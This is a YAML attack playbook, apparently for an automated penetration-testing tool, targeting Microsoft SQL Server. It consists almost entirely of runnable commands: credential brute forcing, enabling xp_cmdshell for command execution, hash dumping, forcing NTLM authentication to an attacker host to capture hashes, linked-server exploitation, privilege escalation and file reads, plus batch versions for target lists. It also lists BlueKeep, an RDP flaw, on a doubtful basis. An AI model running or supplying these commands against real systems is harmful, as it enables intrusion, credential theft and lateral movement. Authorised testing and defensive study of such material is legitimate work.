id: mssql_pentesting
name: MSSQL Penetration Testing (Port 1433)
description: Comprehensive Microsoft SQL Server enumeration, authentication testing, and post-exploitation based on HackTricks methodology
category: enumeration
risk_level: critical
batch_compatible: true

triggers:
  - id: trigger_mssql_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [1433, 1434] }
      protocol: { "$in": ["mssql", "ms-sql-s", "tcp"] }
    required_count: 1
    priority: 6
    description: Triggers when MSSQL service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: mssql_enumeration
    name: MSSQL Service Enumeration
    description: Identify MSSQL version and configuration
    order: 1
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap --script ms-sql-info,ms-sql-ntlm-info,ms-sql-config -p 1433 {host} -oN mssql_enum_{host}.txt"
        preferred: true
        notes: "Comprehensive MSSQL enumeration with nmap"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {host}; run; exit'"
        preferred: false
        notes: "MSSQL instance discovery"
        requires_elevation: false

  - id: mssql_brute_force
    name: MSSQL Authentication Brute Force
    description: Brute force MSSQL credentials
    order: 2
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -P passwords.txt mssql://{host} -t 4"
        preferred: true
        notes: "MSSQL credential brute forcing"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec mssql {host} -u users.txt -p passwords.txt"
        preferred: true
        notes: "MSSQL authentication with CrackMapExec"
        requires_elevation: false
      - tool: mssqlpwner
        platforms: [linux, macos, windows]
        command: "mssqlpwner {host} brute -ul users.txt -pl passwords.txt"
        preferred: false
        notes: "MSSQL brute forcing with MSSQLPwner"
        requires_elevation: false

  - id: mssql_login
    name: MSSQL Login with Credentials
    description: Connect to MSSQL with valid credentials
    order: 3
    timeout_seconds: 60
    commands:
      - tool: mssqlclient
        platforms: [linux, macos, windows]
        command: "mssqlclient.py {domain}/{username}:{password}@{host} -windows-auth"
        preferred: true
        notes: "Connect to MSSQL with Windows authentication (Impacket)"
        requires_elevation: false
      - tool: sqsh
        platforms: [linux, macos]
        command: "sqsh -S {host} -U {username} -P {password}"
        preferred: false
        notes: "Connect to MSSQL with sqsh client"
        requires_elevation: false

  - id: mssql_user_enumeration
    name: MSSQL User and Database Enumeration
    description: Enumerate users, databases, and permissions
    order: 4
    timeout_seconds: 180
    commands:
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use admin/mssql/mssql_enum; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: true
        notes: "Comprehensive MSSQL enumeration"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: true
        notes: "Enumerate SQL logins"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: false
        notes: "Enumerate domain accounts via MSSQL"
        requires_elevation: false

  - id: mssql_xp_cmdshell
    name: MSSQL Command Execution via xp_cmdshell
    description: Enable and execute commands via xp_cmdshell
    order: 5
    timeout_seconds: 180
    commands:
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec mssql {host} -u {username} -p {password} -x 'whoami'"
        preferred: true
        notes: "Execute command via xp_cmdshell (enables if needed)"
        requires_elevation: false
      - tool: mssqlclient
        platforms: [linux, macos, windows]
        command: "mssqlclient.py {domain}/{username}:{password}@{host} -windows-auth"
        preferred: true
        notes: "Manual xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'"
        requires_elevation: false
      - tool: mssqlpwner
        platforms: [linux, macos, windows]
        command: "mssqlpwner {domain}/{username}:{password}@{host} -windows-auth exec whoami"
        preferred: false
        notes: "Execute command with MSSQLPwner"
        requires_elevation: false

  - id: mssql_hash_dump
    name: MSSQL Hash Dumping
    description: Dump MSSQL password hashes
    order: 6
    timeout_seconds: 180
    commands:
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: true
        notes: "Dump MSSQL password hashes (requires sysadmin)"
        requires_elevation: false

  - id: mssql_ntlm_relay
    name: MSSQL NTLM Hash Stealing
    description: Force MSSQL to authenticate and capture NetNTLM hash
    order: 7
    timeout_seconds: 120
    commands:
      - tool: responder
        platforms: [linux, macos]
        command: "responder -I eth0"
        preferred: true
        notes: "Start Responder to capture NetNTLM hashes"
        requires_elevation: true
      - tool: mssqlclient
        platforms: [linux, macos, windows]
        command: "mssqlclient.py {domain}/{username}:{password}@{host} -windows-auth"
        preferred: true
        notes: "Execute: EXEC xp_dirtree '\\\\{attacker_ip}\\share'"
        requires_elevation: false
      - tool: mssqlpwner
        platforms: [linux, macos, windows]
        command: "mssqlpwner {domain}/{username}:{password}@{host} -windows-auth ntlm-relay {attacker_ip}"
        preferred: false
        notes: "Automated NTLM relay attack"
        requires_elevation: false

  - id: mssql_linked_servers
    name: MSSQL Linked Server Enumeration
    description: Enumerate and abuse MSSQL linked servers
    order: 8
    timeout_seconds: 180
    commands:
      - tool: mssqlclient
        platforms: [linux, macos, windows]
        command: "mssqlclient.py {domain}/{username}:{password}@{host} -windows-auth"
        preferred: true
        notes: "Execute: EXEC sp_linkedservers; SELECT * FROM sys.servers"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use exploit/windows/mssql/mssql_linkcrawler; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: true
        notes: "Crawl and exploit MSSQL linked servers"
        requires_elevation: false

  - id: mssql_privesc
    name: MSSQL Privilege Escalation
    description: Escalate from db_owner to sysadmin
    order: 9
    timeout_seconds: 120
    commands:
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use admin/mssql/mssql_escalate_dbowner; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: true
        notes: "Escalate from db_owner to sysadmin (requires trustworthy database)"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use admin/mssql/mssql_escalate_execute_as; set RHOSTS {host}; set USERNAME {username}; set PASSWORD {password}; run; exit'"
        preferred: true
        notes: "Escalate via IMPERSONATE privilege"
        requires_elevation: false

  - id: mssql_file_operations
    name: MSSQL File Read/Write Operations
    description: Read and write files via MSSQL
    order: 10
    timeout_seconds: 180
    commands:
      - tool: mssqlclient
        platforms: [linux, macos, windows]
        command: "mssqlclient.py {domain}/{username}:{password}@{host} -windows-auth"
        preferred: true
        notes: "Read file: SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - mssqlclient
    - crackmapexec
    - metasploit
    - sqsh
    - mssqlpwner
    - hydra
    - responder
  cves:
    - CVE-2019-0708  # BlueKeep (RDP but often found on MSSQL servers)
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
    - https://github.com/ScorpionesLabs/MSSqlPwner
  techniques:
    - xp_cmdshell command execution
    - NTLM hash stealing via UNC path
    - Linked server abuse and pivoting
    - db_owner to sysadmin privilege escalation
    - IMPERSONATE privilege abuse
    - File read via OPENROWSET
    - File write via Ole Automation Procedures
    - Hash dumping
  batch_commands:
    nmap_scan: "nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 -iL {targets_file} -oN mssql_scan.txt"
    crackmapexec: "crackmapexec mssql {targets} -u {username} -p {password} -x 'whoami'"
  notes: |
    MSSQL pentesting often provides:
    - Command execution via xp_cmdshell
    - Lateral movement via linked servers
    - Privilege escalation paths (db_owner -> sysadmin, IMPERSONATE)
    - NetNTLM hash stealing for relay attacks
    - File system access (read/write)
    - Database credential extraction

    Key checks:
    - Default SA password (blank or 'sa')
    - xp_cmdshell enabled
    - Trustworthy databases owned by sysadmin
    - IMPERSONATE permissions
    - Linked servers with elevated privileges
    - Ole Automation Procedures enabled
